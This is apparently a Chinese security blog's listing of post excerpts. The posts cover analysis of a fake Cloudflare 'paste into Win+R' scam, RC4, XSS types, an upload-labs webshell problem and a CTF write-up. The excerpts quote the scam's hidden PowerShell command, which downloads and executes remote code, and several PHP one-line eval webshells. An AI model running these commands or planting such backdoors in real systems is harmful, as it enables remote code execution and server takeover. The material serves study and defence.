前言从B站上看到有人叫骗了，网站pump.fun.ong，就来凑个热闹 研究访问网站发现有Cloudflare的防火墙，但是竟然让我Win+R，Ctrl+V ？这是什么新的社工方式？ 1powershell.exe -WindowStyle Hidden -Command "$oip='pump.fun.ong'; $eip=iwr $oip; iex $eip&qu

一、原理在密码学中，RC4（来自Rivest Cipher 4的缩写）是一种流加密算法，密钥长度可变。它加解密使用相同的密钥，因此也属于对称加密算法。RC4算法的原理很简单，包括初始化算法（KSA）和伪随机子密码生成算法（PRGA）两大部分。 1、初始化算假设S-box的长度为256，密钥长度为Len，在初始化的过程中，密钥的主要功能是将S-box搅乱。 123456789101112131415

一、XSS漏洞分类1、反射型（非持久型）原理：服务器收到客户端请求时的参数，没有进行过滤，直接将参数用于构造HTML，以HTML的形式返回给浏览器，并在浏览器执行 2、存储型（持久型）原理：XSS代码存储在服务器中，当受害者访问URL时，XSS代码被嵌入到HTML中，返回给浏览器，并执行 3、DOM型原理：客户端的JavaScript代码接受数据，没有进行过滤，构造HTML页面的DOM节点

一、后门代码1、一句话后门123<?php @eval($_get['cmd']); ?><?php @eval($_request['cmd']);?><script language="php">@eval($_post['cmd']);</script> 注意，在P

问题环境：phpstudy搭建的 Apache2.4.39 + PHP7.3.4 ，配置文件均为默认 在upload-labs练习中，传了一个图片马，但是蚁剑死活连不上，PHP还报错说 1234Warning: Unexpected character in input: '' (ASCII=28) state=0 in C:\Users\Hel1um17\Codes\loca

一、战队信息战队名称：就来看看题战队排名：87 二、解题情况 三、解题过程1、签到漫画操作内容：四个漫画每个翻到最后一页，每页有四分之一的二维码，用ppt（不会用其他软件·＞﹏＜）把图拼一下，使用在线扫描，url后面即为flag 扫描结果：http://weixin.qq.com/r/4BIrMz7ES2M0rXpQ90fy?flag{youthful_and_upward} flag值：fla